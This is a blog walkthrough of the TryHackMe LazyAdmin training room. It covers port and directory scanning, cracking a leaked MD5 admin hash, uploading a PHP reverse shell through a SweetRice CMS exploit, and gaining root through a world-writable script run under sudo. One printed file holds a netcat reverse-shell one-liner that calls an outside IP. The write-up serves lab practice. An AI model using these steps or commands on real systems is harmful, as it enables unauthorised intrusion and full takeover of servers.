DEV Community

kkaosninja
kkaosninja

Posted on • Updated on

TryHackMe LazyAdmin Room Walkthrough

https://tryhackme.com/room/lazyadmin

Easy linux machine to practice your skills


1) Enumeration

# Nmap 7.91 scan initiated Mon Jul 26 09:12:46 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv 10.10.42.242
adjust_timeouts2: packet supposedly had rtt of -2295969 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2295969 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2297756 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2297756 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2296971 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2296971 microseconds.  Ignoring time.
Nmap scan report for 10.10.42.242
Host is up, received user-set (0.14s latency).
Scanned at 2021-07-26 09:12:46 IST for 532s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE    REASON         VERSION
22/tcp open  ssh        syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  tcpwrapped syn-ack ttl 60
|_http-title: "Apache2 Ubuntu Default Page: It works"
Enter fullscreen mode Exit fullscreen mode

2) Foothold / Getting a shell

Observations. Only two services. SSH and Apache webserver.

  • Port 22 - OpenSSH 7.2p2
└─$ searchsploit openssh 7.2p2
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                                 | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                                           | linux/remote/45210.py
OpenSSH 7.2p2 - Username Enumeration                                                                                                     | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                                     | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                                 | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                                     | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration                                                                                                    | linux/remote/40113.txt
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

Let's get back to this later

  • Port 80 - Webserver - Apache 2.4.1

Result of feroxbuster scan
feroxbuster -u http://10.10.42.242 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php --extract-links

301        9l       28w      314c http://10.10.42.242/content                                                                                                              
301        9l       28w      321c http://10.10.42.242/content/images                                                                                                       
200       36l      151w     2198c http://10.10.42.242/content/index.php                                                                                                    
200       15l       74w     3338c http://10.10.42.242/icons/ubuntu-logo.png                                                                                                
301        9l       28w      318c http://10.10.42.242/icons/small                                                                                                          
200      375l      968w    11321c http://10.10.42.242/index.html                                                                                                           
200      166l      644w     5108c http://10.10.42.242/icons/README                                                                                                       
301        9l       28w      317c http://10.10.42.242/content/js                                                                                                          
200        3l        8w      176c http://10.10.42.242/icons/small/folder.png

Ignoring contents of /icons/small/* since those are part of standard Apache installation

301        9l       28w      318c http://10.10.42.242/content/inc
200        0l        0w        0c http://10.10.42.242/content/inc/db.php
301        9l       28w      317c http://10.10.42.242/content/as
301        9l       28w      324c http://10.10.42.242/content/inc/cache
301        9l       28w      323c http://10.10.42.242/content/inc/lang
200        7l       28w     1553c http://10.10.42.242/content/images/captcha.php
200        0l        0w        0c http://10.10.42.242/content/inc/alert.php
200        0l        0w        0c http://10.10.42.242/content/inc/function.php
301        9l       28w      325c http://10.10.42.242/content/attachment
200        0l        0w        0c http://10.10.42.242/content/inc/404.php
200        0l        0w        0c http://10.10.42.242/content/inc/rssfeed.php
301        9l       28w      321c http://10.10.42.242/content/as/lib
200        0l        0w        0c http://10.10.42.242/content/as/lib/category.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/main.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/media.php
301        9l       28w      320c http://10.10.42.242/content/as/js
200        0l        0w        0c http://10.10.42.242/content/as/lib/post.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/comment.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/information.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/ad.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/license.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/install.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/update.php
Enter fullscreen mode Exit fullscreen mode

Webserver is a mess. Dir listing enabled. PHP files available for everyone to see(not useful as we can only see interpreted results). Also means MySQL/DB installation on remote machine.

Webpage at http://10.10.42.242/content/ says Welcome to SweetRice - Thank your for install SweetRice as your website management system. Looks like some sort of CMS

Link to docs for after-install config on home page => https://www.sweetrice.xyz/docs/5-things-need-to-be-done-when-SweetRice-installed/

At http://10.10.42.242/content/inc/
Alt Text

At http://10.10.42.242/content/as/ , some kind of admin portal
Alt Text

Ok, let's look for some exploits

└─$ searchsploit sweetrice    
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion                                                                                                  | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                                                                               | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                                                                                | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                                                                                  | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                                                                      | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                                                                             | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                                                        | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload                                                                                    | php/webapps/14184.txt
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

Trying to get the version of the CMS, but unable to. Would be great if we could use an arbitrary file upload exploit to get a reverse shell.

In the previous screenshot, we saw a "mysql_backup" folder, which seems to have a backup file. Let's download it and see if we can get some user creds.

Seems like a PHP script that contains a DB SQL schema for the CMS system. There is one statement that contains values to be inserted. In that we find

"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"

So the admin username is manager? And their password hash is that 32-character string? Probably. Let's use Crackstation to crack that hash

Success. its an MD5 hash for CENSORED. Lets try manager:*CENSORED* on the admin portal we found earlier.

SUCCESS!! We have logged in as admin.
Alt Text

We also have the version as 1.5.1. Let's try to use the Aribtrary File Upload exploit

Lets try to upload a PHP reverse shell from /usr/share/webshells/php after configuring IP and port.

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |                                                    
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

Enter The Target URL(Example : localhost.com) : 10.10.42.242/content
Enter Username : manager
Enter Password : CENSORED
Enter FileName (Example:.htaccess,shell.php5,index.html) : revshell.php
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.42.242/content/attachment/revshell.php
Enter fullscreen mode Exit fullscreen mode

Trying to execute reverse shell. Login successful but not working. Getting a 404 error. There is an attachment folder but nothing inside it.

Now trying PHP CSRF/RCE Exploit

So we will upload a HTML ad containing some PHP code for reverse shell to http://10.10.42.242/content/as/?type=ad
Alt Text

SUCCESS! We got shell! Also found user.txt in /home/itguy/

ls -l
total 56
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Desktop
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Documents
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Downloads
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Music
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Pictures
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Public
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Templates
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Videos
-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.pl
-rw-r--r-- 1 itguy itguy 8980 Nov 29  2019 examples.desktop
-rw-rw-r-- 1 itguy itguy   16 Nov 29  2019 mysql_login.txt
-rw-rw-r-- 1 itguy itguy   38 Nov 29  2019 user.txt

www-data@THM-Chal:/home/itguy$ cat mysql_login.txt
*CENSORED*
Enter fullscreen mode Exit fullscreen mode

MySQL creds. Something to keep in mind for later on.

MySQL Login success. Version info
Server version: 5.7.28-0ubuntu0.16.04.2

3) Privilege Escalation

Let's try running a PrivEsc script to find some vectors

Link to lse.sh => https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Uploaded and running lse.sh -i -l 1 for privesc vectors

Interesting stuff from lse.sh results

[*] usr020 Are there other users in administrative groups?................. yes!
--------
adm:x:4:syslog,itguy
sudo:x:27:itguy

[!] sud010 Can we list sudo commands without a password?................... yes!
--------
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Enter fullscreen mode Exit fullscreen mode

This looks interesting. So let's explore this a bit.

Looks like we can run sudo /usr/bin/perl /home/itguy/backup.pl as anyone

Contents of backup.pl, which is readable by www-data

www-data@THM-Chal:/home/itguy$ cat backup.pl 
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
Enter fullscreen mode Exit fullscreen mode

Wish we could edit this, but we can't. What about /etc/copy.sh ?

www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh; cat /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Enter fullscreen mode Exit fullscreen mode

Looks like /etc/copy.sh is world-writable. sysadmin originally set it up to send a reverse shell to another machine. But we will reconfigure it to execute bash and get a root shell.

After modification

www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
/bin/bash -i
Enter fullscreen mode Exit fullscreen mode

Time for action!

www-data@THM-Chal:/home/itguy$ sudo -u root /usr/bin/perl /home/itguy/backup.pl
root@THM-Chal:/home/itguy# id
uid=0(root) gid=0(root) groups=0(root)
Enter fullscreen mode Exit fullscreen mode

Woohoo! And that's that!

Discussion (0)